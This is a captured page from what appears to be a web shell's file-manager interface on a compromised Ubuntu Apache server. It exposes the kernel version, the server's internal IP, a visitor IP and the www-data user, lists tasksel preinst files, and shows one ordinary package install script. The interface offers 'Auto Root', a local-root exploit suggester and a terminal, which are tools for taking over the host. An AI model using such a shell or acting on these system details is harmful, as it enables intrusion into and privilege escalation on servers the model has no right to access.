Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
tasksel /
info /
Delete
Unzip
Name
Size
Permission
Date
Action
desktop.preinst
439
B
-rwxr-xr-x
2016-01-02 03:46
edubuntu-desktop.preinst
439
B
-rwxr-xr-x
2016-01-02 03:46
kubuntu-desktop.preinst
439
B
-rwxr-xr-x
2016-01-02 03:46
lubuntu-desktop.preinst
439
B
-rwxr-xr-x
2016-01-02 03:46
mythbuntu-desktop.preinst
439
B
-rwxr-xr-x
2016-01-02 03:46
ubuntu-desktop.preinst
439
B
-rwxr-xr-x
2016-01-02 03:46
ubuntu-gnome-desktop.preinst
439
B
-rwxr-xr-x
2016-01-02 03:46
ubuntu-mate-desktop.preinst
439
B
-rwxr-xr-x
2016-01-02 03:46
ubuntustudio-desktop.preinst
439
B
-rwxr-xr-x
2016-01-02 03:46
xubuntu-desktop.preinst
439
B
-rwxr-xr-x
2016-01-02 03:46
Save
Rename
#!/bin/sh set -e # We install the X server early on so that other packages (e.g. usplash) can # get at the resolution it configures. It is listed as part of the task, # which will take care of its removal when the task is removed. for pkg in xserver-xorg; do if apt-cache show "$pkg" >/dev/null 2>&1 && ! dpkg --get-selections | egrep "^$pkg[[:space:]]+install"; then apt-get "$@" -q -y -f install $pkg >/dev/null || true fi done